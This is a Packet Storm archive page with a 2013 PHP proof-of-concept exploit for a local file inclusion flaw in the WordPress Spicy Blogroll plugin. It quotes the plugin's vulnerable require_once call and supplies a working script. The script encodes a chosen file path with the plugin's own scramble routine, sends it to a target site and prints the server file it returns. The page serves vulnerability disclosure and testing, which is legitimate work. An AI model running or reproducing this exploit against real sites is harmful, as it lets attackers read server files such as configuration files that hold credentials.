exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Spicy Blogroll Local File Inclusion

WordPress Spicy Blogroll Local File Inclusion
Posted Jul 14, 2013
Authored by Ahlspiess

WordPress Spicy Blogroll plugin suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | 3814a0f4ff4e69f4aa928e46072b86b3dd76a24c29f6ade039a04e52b49abd4f

WordPress Spicy Blogroll Local File Inclusion

Change Mirror Download
<?php
// Title: Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability
// Date: 12-07-2013 (GMT+8 Kuala Lumpur)
// Author: Ahlspiess
// Greetz: All TBDIAN - http://w3.tbd.my :)
// Screenshot: http://i.imgur.com/jIrUznC.png
/**
Details:
File: /wp-content/plugins/spicy-blogroll-ajax.php
SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php
<?php
...
...
$link_url = $_GET['link_url'];
$link_text = $_GET['link_text'];
$var2 = unscramble($_GET['var2']);
$var3 = unscramble($_GET['var3']);
$var4 = unscramble($_GET['var4']);
$var5 = unscramble($_GET['var5']);
$nonce = unscramble($_GET['var11']);
require_once($var2.$var4); <-- Boom
...
...
*/

if(!isset($argv[3])) {
die(sprintf("php %s <host> <path> <file>\n", $argv[0]));
}

list(,$host, $path, $file) = $argv;
$vfile = 'http://%s%s/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=%s&var4=%s';
$request = sprintf($vfile, $host, $path, scramble(dirname($file) . "/"), scramble(basename($file)));
$opts = array(
'http'=>array(
'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0",
'ignore_errors' => true,
)
);

$context = stream_context_create($opts);
echo file_get_contents($request, 0, $context);

/**
Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll.php
Line: 386-401
*/
function scramble($text1,$rng = 1){
$len=strlen($text1);
$rn=$rng%2;
$count=7;
$seed=($rn%=2)+1;
$text2=chr($seed+64+$rng).chr($rng+70);
for($i=0; $i<=$len-1; $i++) {
$seed*=-1;
$count+=1;
$ch=ord(substr($text1,$i,1))+$seed;
if($ch==92){$ch.=42;}
$text2.=chr($ch);
if($count%5==$rn){$text2.=chr(mt_rand(97,123));}
}
return $text2;
}

?>

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close